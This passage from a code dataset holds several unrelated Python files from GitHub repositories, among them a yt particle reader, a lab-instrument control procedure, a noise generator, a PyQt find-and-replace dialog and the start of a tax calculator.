selector):\n for chunk in chunks: # These should be organized by grid filename\n for g in chunk.objs:\n for ptype, field_list in sorted(ptf.items()):\n npart = g._pdata[ptype][\"NumberOfParticles\"]\n if npart == 0:\n continue\n\n fn = g._pdata[ptype][\"particle_filename\"]\n offset = g._pdata[ptype][\"offset\"]\n pheader = self.ds.index.particle_headers[ptype]\n\n with open(fn, \"rb\") as f:\n # read in the position fields for selection\n f.seek(offset + pheader.particle_int_dtype.itemsize * npart)\n rdata = np.fromfile(\n f, pheader.real_type, pheader.num_real * npart\n )\n\n # Allow reading particles in 1, 2, and 3 dimensions,\n # setting the appropriate default for unused dimensions.\n pos = []\n for idim in [1, 2, 3]:\n if g.ds.dimensionality >= idim:\n pos.append(\n np.asarray(\n rdata[idim - 1 :: pheader.num_real],\n dtype=np.float64,\n )\n )\n else:\n center = 0.5 * (\n g.LeftEdge[idim - 1] + g.RightEdge[idim - 1]\n )\n pos.append(np.full(npart, center, dtype=np.float64))\n x, y, z = pos\n\n if selector is None:\n # This only ever happens if the call is made from\n # _read_particle_coords.\n yield ptype, (x, y, z)\n continue\n mask = selector.select_points(x, y, z, 0.0)\n if mask is None:\n continue\n for field in field_list:\n # handle the case that this is an integer field\n int_fnames = [\n fname for _, fname in pheader.known_int_fields\n ]\n if field in int_fnames:\n ind = int_fnames.index(field)\n f.seek(offset)\n idata = np.fromfile(\n f, pheader.int_type, pheader.num_int * npart\n )\n data = np.asarray(\n idata[ind :: pheader.num_int], dtype=np.float64\n )\n yield (ptype, field), data[mask].flatten()\n\n # handle case that this is a real field\n real_fnames = [\n fname for _, fname in pheader.known_real_fields\n ]\n if field in real_fnames:\n ind = real_fnames.index(field)\n data = np.asarray(\n rdata[ind :: pheader.num_real], dtype=np.float64\n )\n yield (ptype, field), data[mask].flatten()\n\n\nclass IOHandlerOrion(IOHandlerBoxlib):\n _dataset_type = \"orion_native\"\n\n _particle_filename = None\n\n @property\n def particle_filename(self):\n fn = os.path.join(self.ds.output_dir, \"StarParticles\")\n if not os.path.exists(fn):\n fn = os.path.join(self.ds.output_dir, \"SinkParticles\")\n self._particle_filename = fn\n return self._particle_filename\n\n _particle_field_index = None\n\n @property\n def particle_field_index(self):\n index = parse_orion_sinks(self.particle_filename)\n\n self._particle_field_index = index\n return self._particle_field_index\n\n def _read_particle_selection(self, chunks, selector, fields):\n rv = {}\n chunks = list(chunks)\n\n if isinstance(selector, GridSelector):\n if not (len(chunks) == len(chunks[0].objs) == 1):\n raise RuntimeError\n\n grid = chunks[0].objs[0]\n\n for ftype, fname in fields:\n rv[ftype, fname] = self._read_particles(grid, fname)\n\n return rv\n\n rv = {f: np.array([]) for f in fields}\n for chunk in chunks:\n for grid in chunk.objs:\n for ftype, fname in fields:\n data = self._read_particles(grid, fname)\n rv[ftype, fname] = np.concatenate((data, rv[ftype, fname]))\n return rv\n\n def _read_particles(self, grid, field):\n \"\"\"\n parses the Orion Star Particle text files\n\n \"\"\"\n\n particles = []\n\n if grid.NumberOfParticles == 0:\n return np.array(particles)\n\n def read(line, field):\n entry = line.strip().split(\" \")[self.particle_field_index[field]]\n return float(entry)\n\n try:\n lines = self._cached_lines\n for num in grid._particle_line_numbers:\n line = lines[num]\n particles.append(read(line, field))\n return np.array(particles)\n except AttributeError:\n fn = self.particle_filename\n with open(fn) as f:\n lines = f.readlines()\n self._cached_lines = lines\n for num in grid._particle_line_numbers:\n line = lines[num]\n particles.append(read(line, field))\n return np.array(particles)\n","repo_name":"yt-project/yt","sub_path":"yt/frontends/boxlib/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":10522,"program_lang":"python","lang":"en","doc_type":"code","stars":411,"dataset":"github-code","pt":"3"} +{"seq_id":"34963692516","text":"import socket\nimport random\n#HOST E PORTA\n#myhost = '127.0.0.1' \nmyhost = '192.168.0.106'\nmyport = 3003 \n\n#criar server\nwith socket.socket(socket.AF_INET, socket.SOCK_STREAM) as server:\n server.bind((myhost, myport))\n server.listen(5)\n\n #config conexões\n conexao, endereco = server.accept()\n with conexao:\n print('[*] servidor conectado por', endereco)\n while True:\n data = conexao.recv(1024)\n if data == b'y':\n randnum = random.randrange(100)\n byt = bytes([randnum])\n print(byt)\n conexao.send(byt)\n else: break\n if not data: break\n \n \n","repo_name":"Tarsisnbs/estagio_gmicro","sub_path":"uPPG/outros scripts/Server.py","file_name":"Server.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34057896962","text":"import argparse, os.path\nfrom datetime import datetime\nimport numpy as np\nfrom contextlib import closing, ExitStack\nfrom scipy.optimize import curve_fit\nfrom tensiometre.dt3100 import DT3100, recover\nfrom tensiometre.mpc385 import MPC385\nfrom tensiometre import mechtest3sensors\nfrom tensiometre.chirp import optimal_chirp, load_chirp_moduli, fit_powerlaw_modulus\nfrom tensiometre.show_measurements import show_measurement\n\n\ndef measure_state():\n with ExitStack() as stack:\n sensors = [stack.enter_context(closing(DT3100(f'169.254.{i+3:d}.100'))) for i in range(3)]\n mpc = stack.enter_context(closing(MPC385()))\n return mechtest3sensors.State().read(sensors, mpc, ab2xy)\n\nfrom scipy.signal import chirp\ndef optimal_chirp(t, amplitude=10, f1=1e-2, f2=1, T=66, r=0.1, delay=4):\n td = np.mod(t,T+delay)\n tt = td-delay\n chrp = chirp(tt, f1, T, f2, phi=90, method='logarithmic')\n chrp = np.where(\n tt<0, 0, np.where(\n 2*tt < r*T,\n np.cos(np.pi/r*(tt/T-r/2))**2 * chrp,\n np.where(\n tt/T > 1 - r/2,\n np.cos(np.pi/r*(tt/T-1+r/2))**2 * chrp,\n chrp\n )\n )\n )\n return amplitude*chrp\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Procedure to apply a constant stress while maintaining a gap of 100µm.')\n parser.add_argument('stress', type=float, help = \"\"\"Stress to apply, in units of the measured modulus.\"\"\")\n parser.add_argument('calibrationfilename', type=str, help='path and name of the ab2xy calibration file. Expects a .npy.')\n parser.add_argument('--gap', type=float, default=100, help='Gap to open from the initial (touching) position. Default 100µm.')\n parser.add_argument('--fmin', type=float, default=0.01, help='Lowest frequency of the chirp in X during gelation (Hz). Default 0.01Hz.')\n parser.add_argument('--fmax', type=float, default=1, help='Highest frequency of the chirp in X during gelation (Hz). Default 1Hz.')\n parser.add_argument('--ampl', type=float, default=3, help='Amplitude of the chirp in X during gelation (µm).')\n parser.add_argument('--T', type=float, default=198, help='Duration of the chirps in X during gelation (s)')\n parser.add_argument('--delay', type=float, help='Delay between the chirps in X during gelation (s). By default T/16.')\n\n args = parser.parse_args()\n if args.delay is None:\n args.delay = args.T / 16\n ab2xy = np.load(args.calibrationfilename)\n\n recover(), recover('169.254.4.100'), recover('169.254.5.100')\n with closing(MPC385()) as actuator:\n print(actuator.update_current_position())\n\n input(f\"Please move to just touching the bottom. Enter when OK.\")\n touching_state = measure_state()\n now = datetime.now().strftime('%Y%m%d_%H%M')\n touching_state.save(f'touching_{now}.npy')\n\n now = datetime.now().strftime('%Y%m%d_%H%M')\n print(f\"{now}: Lifting up by {args.gap} µm to setup the initial gap size. Maintain 60s to ensure steady state.\")\n mechtest3sensors.move_to_constant_positions(\n ab2xy,\n outnames = [f'positon_from_bottom_100um_{now}.raw'],\n dxs=[0], dys=[100],\n durations=[60],\n kp=0.1,\n state0=touching_state\n )\n force_free = measure_state()\n now = datetime.now().strftime('%Y%m%d_%H%M')\n force_free.save(f'force_free_{now}.npy')\n print(f\"position wrt touching: {force_free.head_to_ground - touching_state.head_to_ground}\")\n print(f\"deflection wrt touching: {force_free.deflection - touching_state.deflection}\")\n\n functions = [\n lambda t: optimal_chirp(\n t, amplitude=args.ampl, T=args.T, delay=args.delay,\n f1=args.fmin, f2=args.fmax,\n ),\n lambda t: 0\n ]\n now = datetime.now().strftime('%Y%m%d_%H%M')\n print(f\"{now}: Maintain the gap size while chirping in shear with amplitude {args.ampl} microns, duration {args.T}s, delay {args.delay} s.\")\n chirpname = f'maintain_gap_100um_armchirpX_{now}.raw'\n mechtest3sensors.timedep_armX_positionY(\n ab2xy,\n chirpname,\n functions,\n duration=3600, kp=[1,0.01], ki=[0,1e-5],\n moveback=False, state0=force_free\n )\n # now = datetime.now().strftime('%Y%m%d_%H%M')\n # print(f\"{now}: Maintain the gap size for 1h while oscillating in shear 2µm 0.1Hz.\")\n # mechtest3sensors.oscillating_position(\n # ab2xy,\n # f'maintain_gap_100um_oscillateX_{now}.raw',\n # amplitudex = args.ampl, amplitudey=0, freqx=args.freq, freqy=0,\n # duration=3600, kp=[0.1,0.01], ki=[0,1e-5],\n # moveback=False, state0=force_free\n # )\n # print(f\"{now}: Maintain the gap size for 1h.\")\n # mechtest3sensors.move_to_constant_positions(\n # ab2xy,\n # outnames = [f'maintain_gap_100um_{now}.raw'],\n # dxs=[0], dys=[100],\n # durations=[3600],\n # kp=0.01, ki=1e-5,\n # state0=touching_state\n # )\n recover(), recover('169.254.4.100'), recover('169.254.5.100')\n with closing(MPC385()) as actuator:\n print(actuator.update_current_position())\n after_gelation = measure_state()\n now = datetime.now().strftime('%Y%m%d_%H%M')\n after_gelation.save(f'after_gelation_{now}.npy')\n print(f\"position: {after_gelation.head_to_ground - touching_state.head_to_ground}\")\n print(f\"deflection wrt force free: {after_gelation.deflection - force_free.deflection}\")\n\n now = datetime.now().strftime('%Y%m%d_%H%M')\n print(f\"{now}: Estimate shear modulus at 1Hz from the last chirp, extrapolating the power law.\")\n freqs, Gs = load_chirp_moduli(chirpname, T=args.T, delay=args.delay)\n alpha, modulus = fit_powerlaw_modulus(freqs, Gs[-1], M=190)\n print(f'Module deflection vs displacement @1Hz: {modulus}. Power alpha={alpha}')\n\n\n # now = datetime.now().strftime('%Y%m%d_%H%M')\n # print(f\"{now}: Estimate shear modulus of the gel by step strains<3µm. Repeated 3 times.\")\n # for k in range(1,4):\n # dxs = np.arange(0,10,3).astype(float)\n # dxs = np.append(dxs, 0.0)\n # dys = np.zeros_like(dxs)\n # outnames = ['shear%d_%d.raw'%(k,dx) for dx in dxs]\n # outnames[-1] = 'moveback_original_%d.raw'%k\n # durations = [60]*len(dxs)\n # durations[-1] = 6*60\n # mechtest3sensors.move_to_constant_positions(\n # ab2xy,\n # outnames,\n # dxs, dys,\n # durations,\n # kp=0.1, moveback=False,\n # state0=after_gelation)\n # print(f'Linear rheology number {k} at time {180+(k-1)*10}')\n # dXs = np.zeros(len(dxs))\n # dYs = np.zeros(len(dxs))\n # stdX = np.zeros(len(dxs))\n # stdY = np.zeros(len(dxs))\n # for i, outname in enumerate(outnames):\n # data = np.fromfile(outname)\n # t, x, y, X, Y, y_ag = data.reshape((len(data)//6,6)).T\n # y_hg = Y + y_ag\n # avgX = X[-100:].mean()\n # avgY = Y[-100:].mean() #(Y[-100:] + 16*y_ag[-100:] - y[-100:]).mean()\n # stdX[i] = np.std(X[-100:])\n # stdY[i] = np.std(Y[-100:])#np.std(Y[-100:]+ 16*y_ag[-100:] - y[-100:])\n # dXs[i] = avgX - after_gelation.deflection[0]\n # dYs[i] = avgY - after_gelation.deflection[1]\n #\n # np.savetxt((datetime.now().strftime('%Y%m%d_%H%M_stressvsshear_method2.txt')),(dxs,dXs,dYs,stdX,stdY))\n # #Stress strain linear rheology for linear regime\n # a,b = curve_fit(lambda u,a: u*a, dxs, dXs)\n # module = a[0] # unit µm/µm\n # print(f'Module deflection vs displacement: {module}')\n\n # Again check the change w.r.t the inital set position(Xinit,Yinit) and initial zero stress deflection\n # after_linear_rheology = measure_state()\n # now = datetime.now().strftime('%Y%m%d_%H%M')\n # after_linear_rheology.save(f'after_linear_rheology_{now}.npy')\n # print(f\"position: {after_linear_rheology.head_to_ground - touching_state.head_to_ground}\")\n # print(f\"deflection wrt force free: {after_linear_rheology.deflection - force_free.deflection}\")\n\n now = datetime.now().strftime('%Y%m%d_%H%M')\n print(f\"{now}: Apply the constant stress\")\n h = (after_gelation.head_to_ground - touching_state.head_to_ground)[1]\n defl = -args.stress*modulus*h # calculated from the linear rheology\n print(f'We plan to apply a deflection of {defl:0.3f} um')\n #Present sensor readings\n xy2ab = np.linalg.inv(ab2xy)\n a0, b0 = xy2ab @ after_gelation.deflection\n #what is the condition on Delta X to keep sensor a in range?\n #0 < a0 + Delta a < 800\n #0 < a0 + xy2ab[0,0] * Delta X + xy2ab[0,1] * Delta Y < 800\n #here we suppose that there is no Delta Y\n #0 < a0 + xy2ab[0,0] * Delta X < 800\n #minimum and maximum deflexion depend on the sign of the xy2ab matrix elements\n if xy2ab[0,0]>0:\n mindefl = -a0/xy2ab[0,0]\n maxdefl = (800-a0)/xy2ab[0,0]\n else:\n mindefl = (800-a0)/xy2ab[0,0]\n maxdefl = -a0/xy2ab[0,0]\n #same for sensor b and combine the two conditions\n if xy2ab[1,0]>0:\n mindefl = max(mindefl, -b0/xy2ab[1,0])\n maxdefl = min(maxdefl, (800-b0)/xy2ab[1,0])\n else:\n mindefl = max(mindefl, (800-b0)/xy2ab[1,0])\n maxdefl = min(maxdefl, -b0/xy2ab[1,0])\n #security coefficient of 0.9\n mindefl *=0.9\n maxdefl *=0.9\n print(f'Deflection must be between {mindefl:0.3f} um and {maxdefl:0.3f} um')\n #saturates deflection\n defl = np.maximum(mindefl, np.minimum(maxdefl, defl))\n print(f'The applied deflection will be {defl:0.3f} um')\n now = datetime.now().strftime('%Y%m%d_%H%M')\n outname = f'add_constant_deflectionX{defl:0.3f}_stay_constant_positiony_{now}.raw'\n mechtest3sensors.add_constant_deflectionX_stay_constant_positiony(\n outname,\n ab2xy,\n kp=[0.2,0.1], ki=[0.001,0.001], kd =[0.0,0.0],\n dX=defl,\n moveback= True, state0 = force_free, maxYdispl = 300\n )\n after_creep = measure_state()\n now = datetime.now().strftime('%Y%m%d_%H%M')\n after_creep.save(f'after_creep_{now}.npy')\n print(f\"position: {after_creep.head_to_ground - touching_state.head_to_ground}\")\n print(f\"deflection wrt force free: {after_creep.deflection - force_free.deflection}\")\n","repo_name":"MathieuLeocmach/tensiometre","sub_path":"tensiometre/procedure_constant_gap_gelation_creep.py","file_name":"procedure_constant_gap_gelation_creep.py","file_ext":"py","file_size_in_byte":10270,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"9154576291","text":"if __name__ == \"__main__\":\n with open(\"Input.txt\") as f:\n trees = []\n for line in f:\n line = line.replace(\"\\n\", \"\")\n treeRow = []\n for tree in line:\n treeRow.append(int(tree))\n\n trees.append(treeRow)\n\n visibleTreeCount = 0\n visibleTrees = []\n for rowIndex, row in enumerate(trees):\n for columnIndex, treeHeight in enumerate(row):\n # Iterate each tree, then approach from each direction to see\n # if it's visible\n # Edge trees are always visible\n if rowIndex == 0 or columnIndex == 0 or rowIndex == len(trees) - 1 or columnIndex == len(trees[0]) - 1:\n visibleTreeCount += 1\n visibleTrees.append([rowIndex, columnIndex])\n continue\n else:\n # First check to the left\n for compareTreeHeight in trees[rowIndex][:columnIndex]:\n if compareTreeHeight >= treeHeight:\n break\n else:\n visibleTreeCount += 1\n visibleTrees.append([rowIndex, columnIndex])\n continue\n\n # then the right\n for compareTreeHeight in trees[rowIndex][columnIndex + 1:]:\n if compareTreeHeight >= treeHeight:\n break\n else:\n visibleTreeCount += 1\n visibleTrees.append([rowIndex, columnIndex])\n continue\n\n # then from above\n for compareTreeHeight in trees[:rowIndex]:\n if compareTreeHeight[columnIndex] >= treeHeight:\n break\n else:\n visibleTreeCount += 1\n visibleTrees.append([rowIndex, columnIndex])\n continue\n\n # and finally from below\n for compareTreeHeight in trees[rowIndex + 1:]:\n if compareTreeHeight[columnIndex] >= treeHeight:\n break\n else:\n visibleTreeCount += 1\n visibleTrees.append([rowIndex, columnIndex])\n continue\n \n print(visibleTrees)\n print(visibleTreeCount)","repo_name":"Jonnyvb/Advent-of-code-2022","sub_path":"Day 8/Part-1.py","file_name":"Part-1.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20976634016","text":"#===============================================================================\r\n# Filename: Noise.py\r\n# Author: Aaron Thompson\r\n# Date Created: 3/26/2021\r\n# Last Updated: 3/29/2021\r\n#\r\n# Description: \r\n#===============================================================================\r\nimport numpy as np\r\nimport cupy as cp\r\nimport math\r\nfrom numba import vectorize\r\nfrom numba import jit\r\n#-------------------------------------------------------------------------------\r\n#PARAMETERS\r\nN = 10**6\r\n\r\n#CONSTANTS\r\nSQRT_PI = math.sqrt(math.pi)\r\nSQRT_2DIVPI = math.sqrt(2/math.pi)\r\n\r\n#COMPUTATION\r\nt0 = 0\r\na0 = 0\r\nn = np.arange(1, N+1)\r\ncoeff = 0\r\nsin = 0\r\n\r\n#General Functions\r\n#-------------------------------------------------------------------------------\r\ndef GenerateNoise(length, type=\"white\"):\r\n type = type.lower()\r\n if(type == \"white\"):\r\n return GenerateWhiteNoise(length)\r\n elif(type == \"brown\"):\r\n return GenerateBrownNoise(length)\r\n elif(type == \"pink\"):\r\n return GeneratePinkNoise(length)\r\n else:\r\n return None\r\n\r\ndef GenerateNoiseFast(length, nSamples=4, sampleLength=8820, type=\"white\"):\r\n noise = GenerateNoise(nSamples * sampleLength, type)\r\n samples = np.split(noise, nSamples)\r\n \r\n n = math.ceil(length/sampleLength)\r\n indices = np.random.randint(0, nSamples, n)\r\n noise = np.copy(samples[indices[0]])\r\n print(indices)\r\n for i in range(1,n):\r\n np.append(noise, samples[indices[i]])\r\n\r\n return np.resize(noise, length)\r\n\r\n#Brown Noise\r\n#-------------------------------------------------------------------------------\r\ndef GenerateBrownNoise(length):\r\n t = np.linspace(0, math.pi, length)\r\n an = np.random.normal(0, 1, N+1)\r\n\r\n sums = np.empty(length)\r\n for i in range(length):\r\n sequence = BrownSequence(an[1:], n, t[i])\r\n sums[i] = np.sum(sequence)\r\n\r\n return (an[0]/SQRT_PI) * t + sums\r\n\r\n@vectorize(['float64(float64, int32, float64)'], target='cuda')\r\ndef BrownSequence(a, n, t):\r\n return (a/n) * SQRT_2DIVPI * math.sin(n * t)\r\n\r\n#White Noise\r\n#-------------------------------------------------------------------------------\r\n\r\ndef GenerateWhiteNoise(length):\r\n t = np.linspace(0, math.pi, length)\r\n an = np.random.normal(0, 1, N+1)\r\n\r\n sums = np.empty(length)\r\n for i in range(length):\r\n sequence = WhiteSequence(an[1:], n, t[i])\r\n sums[i] = np.sum(sequence)\r\n\r\n return ((an[0]/SQRT_PI) + sums)/(N *(10**-3))\r\n\r\n@vectorize(['float64(float64, int32, float64)'], target='cuda')\r\ndef WhiteSequence(a, n, t):\r\n return a * SQRT_2DIVPI * math.cos(n * t)\r\n\r\n#Pink Noise\r\n#-------------------------------------------------------------------------------\r\ndef GeneratePinkNoise(length, frequency=44100, alpha=1.1):\r\n noise = GenerateWhiteNoise(length)\r\n return PinkFilter(noise, frequency, alpha)\r\n\r\n@vectorize(['float64(float64, int32, float64)'])\r\ndef PinkFilter(noise, frequency, alpha):\r\n return noise / (frequency**(alpha/2))","repo_name":"aamithompson/NoiseGenerator","sub_path":"Noise.py","file_name":"Noise.py","file_ext":"py","file_size_in_byte":2988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6314479743","text":"#Trains basic perceptron on everything and find weights \r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport pandas as pd \r\nimport sklearn.model_selection\r\nimport sklearn.linear_model\r\nimport sklearn.preprocessing\r\n\r\nBaseline1 = [\"Event\",\"LapTime\", \"NextLapTime\",\"LapNumber\", \"PLapTime\", \"PPLapTime\", \"PPPLapTime\"]\r\nIdentity = [\"DriverNumber\", \"Team\"] \r\nTyre = [\"Compound\", \"TyreLife\", \"FreshTyre\"] \r\nSectorTimes = [\"S1Time\", \"S2Time\", \"S3Time\"] \r\nSessionTimes = [\"S1STime\", \"S2STime\", \"S2STime\"] \r\nRecordTimes = [\"SpeedI2\", \"SpeedFL\", \"SpeedST\"] \r\nLapStatus = [\"IsPersonalBest\", \"Position\", \"Deleted\", \"TrackStatus\"]\r\n\r\n\r\n\r\nerrors = []\r\n\r\nfor j in range(0,3):\r\n\r\n error = 0 \r\n\r\n for i in range(10):\r\n\r\n groups = Baseline1 + Identity + Tyre + SectorTimes + SessionTimes + RecordTimes + LapStatus\r\n totalFrame = pd.read_csv(\"./raceData2019MultiplePrevLaps.csv\").dropna()\r\n data = totalFrame[groups]\r\n\r\n X = (data.loc[:, data.columns != 'NextLapTime']).to_numpy()\r\n Y = (data.loc[:, data.columns == 'NextLapTime']).to_numpy()\r\n\r\n X = sklearn.preprocessing.PolynomialFeatures(degree=j).fit_transform(X)\r\n X_train, X_test, Y_train, Y_test = sklearn.model_selection.train_test_split(X, Y, test_size=0.2, shuffle=True,)\r\n X_train, X_eval, Y_train, Y_eval = sklearn.model_selection.train_test_split(X_train, Y_train, test_size=0.25, shuffle=True,)\r\n #\r\n\r\n perceptron = sklearn.linear_model.Ridge(tol=0.00001)\r\n perceptron.fit(X_train, Y_train)\r\n Y_predict = perceptron.predict(X_test)\r\n Y_eval_predict = perceptron.predict(X_eval)\r\n\r\n error += np.sqrt(np.mean((Y_eval-Y_eval_predict)**2))\r\n\r\n errors.append(error/10)\r\n\r\n\r\nplt.title(\"Error Vs Degree of Polynomial Features\")\r\nplt.xlabel(\"Degree of Polynomial Features\")\r\nplt.ylabel(\"Error\")\r\nplt.plot(range(0,3),errors)\r\nplt.show()\r\n\r\nprint(errors)","repo_name":"dzarezankova/syde-522-final-proj","sub_path":"addMoreFeatures.py","file_name":"addMoreFeatures.py","file_ext":"py","file_size_in_byte":1908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"37797887354","text":"import _wingpio as gpio\r\nimport time\r\nfrom pin import PinController\r\n\r\nclass BoardController(object):\r\n\r\n def __init__(self):\r\n self._yellowPin = PinController(5, 'yellow')\r\n self._redPin = PinController(6, 'red')\r\n self._counter = 0\r\n\r\n def start(self):\r\n while True:\r\n self._counter = self._counter + 1\r\n if(self._counter % 2 == 0):\r\n if(self._redPin.value == gpio.HIGH):\r\n self._redPin.value = gpio.LOW\r\n else:\r\n self._redPin.value = gpio.HIGH\r\n else:\r\n if self._yellowPin.value == gpio.HIGH:\r\n self._yellowPin.value = gpio.LOW\r\n else:\r\n self._yellowPin.value = gpio.HIGH\r\n\r\n time.sleep(0.5)","repo_name":"ppopadiyn/win10-iot-blink-leds","sub_path":"src/python/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"1337915270","text":"from math import pow \nfrom math import pi\nverdadero = pow(pi,4)/90\nn = 10000\nant = 0\ni = n\nprint(\" n verdadero aprox error et error ea\")\nwhile (1):\n if(i>n): \n break\n serie = ant + (1/pow(i,4))\n et= 100*(verdadero-serie)/verdadero\n ea=100*(serie-ant)/serie\n ant= serie\n print(\" %d %f %f %f %f \" %(i,verdadero,serie,et,ea))\n i=i-1; \n","repo_name":"Cruzme12/TRABAJOSS","sub_path":"Serie.py","file_name":"Serie.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"9349821871","text":"#!/usr/bin/env python\r\n# Copyright (c) 2008 Qtrac Ltd. All rights reserved.\r\n# This program or module is free software: you can redistribute it and/or\r\n# modify it under the terms of the GNU General Public License as published\r\n# by the Free Software Foundation, either version 2 of the License, or\r\n# version 3 of the License, or (at your option) any later version. It is\r\n# provided for educational purposes and is distributed in the hope that\r\n# it will be useful, but WITHOUT ANY WARRANTY; without even the implied\r\n# warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See\r\n# the GNU General Public License for more details.\r\n\r\nfrom __future__ import division\r\nfrom __future__ import print_function\r\nfrom __future__ import unicode_literals\r\nfrom future_builtins import *\r\n\r\nimport re\r\nfrom PyQt4.QtCore import (Qt, SIGNAL, pyqtSignature)\r\nfrom PyQt4.QtGui import (QApplication, QDialog)\r\nimport ui_findandreplacedlg\r\n\r\nMAC = True\r\ntry:\r\n from PyQt4.QtGui import qt_mac_set_native_menubar\r\nexcept ImportError:\r\n MAC = False\r\n\r\n\r\n# This class should be a subclass of both QDialog class and ui_xxxxx class.\r\nclass FindAndReplaceDlg(QDialog,\r\n ui_findandreplacedlg.Ui_FindAndReplaceDlg):\r\n\r\n def __init__(self, text, parent=None):\r\n # The clause below means QDialog.__init__(self, parent)\r\n super(FindAndReplaceDlg, self).__init__(parent)\r\n self.__text = unicode(text)\r\n self.__index = 0\r\n # setupUi(self) will do two things, one:\r\n # 1. create the widgets and layout which is defined in Qt Designer.\r\n # 2. calls QtCore.QMetaObject.connectSlotsByName(), a static method that creates signal-slot connections between form\r\n # widget signals and methods in our subclass that follow a particular naming convention.\r\n # Any method whose name is of the form on_widgetName_signalName will have the named widget's named signal connected to it.\r\n # In this case, it is 'on_findLineEdit_textEdited' method below.\r\n # That is the widget named 'findLineEdit' will auto connect a signal 'textEdited(text)' to the slot 'on_findLineEdit_textEdited(self, text)'\r\n \r\n # For the option 2 above, I personally, hope to use the traditional way to write connect method myself.\r\n self.setupUi(self)\r\n if not MAC:\r\n self.findButton.setFocusPolicy(Qt.NoFocus)\r\n self.replaceButton.setFocusPolicy(Qt.NoFocus)\r\n self.replaceAllButton.setFocusPolicy(Qt.NoFocus)\r\n self.closeButton.setFocusPolicy(Qt.NoFocus)\r\n self.updateUi()\r\n\r\n\r\n @pyqtSignature(\"QString\")\r\n def on_findLineEdit_textEdited(self, text):\r\n self.__index = 0\r\n self.updateUi()\r\n\r\n\r\n def makeRegex(self):\r\n findText = unicode(self.findLineEdit.text())\r\n if unicode(self.syntaxComboBox.currentText()) == \"Literal\":\r\n findText = re.escape(findText)\r\n flags = re.MULTILINE|re.DOTALL|re.UNICODE\r\n if not self.caseCheckBox.isChecked():\r\n flags |= re.IGNORECASE\r\n if self.wholeCheckBox.isChecked():\r\n findText = r\"\\b{0}\\b\".format(findText)\r\n return re.compile(findText, flags)\r\n\r\n\r\n @pyqtSignature(\"\")\r\n def on_findButton_clicked(self):\r\n regex = self.makeRegex()\r\n match = regex.search(self.__text, self.__index)\r\n if match is not None:\r\n self.__index = match.end()\r\n self.emit(SIGNAL(\"found\"), match.start())\r\n else:\r\n self.emit(SIGNAL(\"notfound\"))\r\n \r\n \r\n @pyqtSignature(\"\")\r\n def on_replaceButton_clicked(self):\r\n regex = self.makeRegex()\r\n self.__text = regex.sub(unicode(self.replaceLineEdit.text()),\r\n self.__text, 1)\r\n \r\n\r\n @pyqtSignature(\"\")\r\n def on_replaceAllButton_clicked(self):\r\n regex = self.makeRegex()\r\n self.__text = regex.sub(unicode(self.replaceLineEdit.text()),\r\n self.__text)\r\n \r\n\r\n def updateUi(self):\r\n enable = not self.findLineEdit.text().isEmpty()\r\n self.findButton.setEnabled(enable)\r\n self.replaceButton.setEnabled(enable)\r\n self.replaceAllButton.setEnabled(enable)\r\n\r\n\r\n def text(self):\r\n return self.__text\r\n\r\n\r\nif __name__ == \"__main__\":\r\n import sys\r\n\r\n text = \"\"\"US experience shows that, unlike traditional patents,\r\nsoftware patents do not encourage innovation and R&D, quite the\r\ncontrary. In particular they hurt small and medium-sized enterprises\r\nand generally newcomers in the market. They will just weaken the market\r\nand increase spending on patents and litigation, at the expense of\r\ntechnological innovation and research. Especially dangerous are\r\nattempts to abuse the patent system by preventing interoperability as a\r\nmeans of avoiding competition with technological ability.\r\n--- Extract quoted from Linus Torvalds and Alan Cox's letter\r\nto the President of the European Parliament\r\nhttp://www.effi.org/patentit/patents_torvalds_cox.html\"\"\"\r\n\r\n def found(where):\r\n print(\"Found at {0}\".format(where))\r\n\r\n def nomore():\r\n print(\"No more found\")\r\n\r\n app = QApplication(sys.argv)\r\n form = FindAndReplaceDlg(text)\r\n form.connect(form, SIGNAL(\"found\"), found)\r\n form.connect(form, SIGNAL(\"notfound\"), nomore)\r\n form.show()\r\n app.exec_()\r\n print(form.text())\r\n\r\n","repo_name":"ghosert/VimProject","sub_path":"pyqt/book_samples/chap07/findandreplacedlg.py","file_name":"findandreplacedlg.py","file_ext":"py","file_size_in_byte":5416,"program_lang":"python","lang":"en","doc_type":"code","stars":208,"dataset":"github-code","pt":"3"} +{"seq_id":"9147614567","text":"'''Created by Steffny Marif Bill\r\non 15 March 2019'''\r\n\r\nfrom tkinter import*\r\nimport tkinter.messagebox\r\n\r\n\r\nclass CalTax:\r\n\r\n def __init__(self, root):\r\n self.root = root\r\n self.root.title('PNG Income Tax Calculator - 2012')\r\n self.root.geometry(\"800x3800+0+0\")\r\n self.root.maxsize(height=500, width=500) #set fixed size for window\r\n\r\n frame1 = Frame(self.root, padx=20, bd=16)\r\n frame1.grid()\r\n\r\n frame2 = Frame(frame1, width=600, height=100, padx=12, bd=10, relief=RIDGE)\r\n frame2.grid(row=0, column=0)\r\n\r\n frame3 = Frame(frame1, width=200, height=50, padx=0, pady=0, bd=10, relief=RIDGE)\r\n frame3.grid(row=1, column=0)\r\n\r\n #========================================================Variables & Entry & Labels===============================================================================================\r\n\r\n amt = DoubleVar()\r\n resultThreeDep = DoubleVar()\r\n resultTwoDep = DoubleVar()\r\n resultOneDep = DoubleVar()\r\n resultNilDep = DoubleVar()\r\n resultNonRes = DoubleVar()\r\n\r\n #check if input is float or valid number\r\n def only_num(string):\r\n regex = re.compile(r\"(\\+|\\-)?[0-9.]*$\")\r\n result = regex.match(string)\r\n return(string ==\"\" or 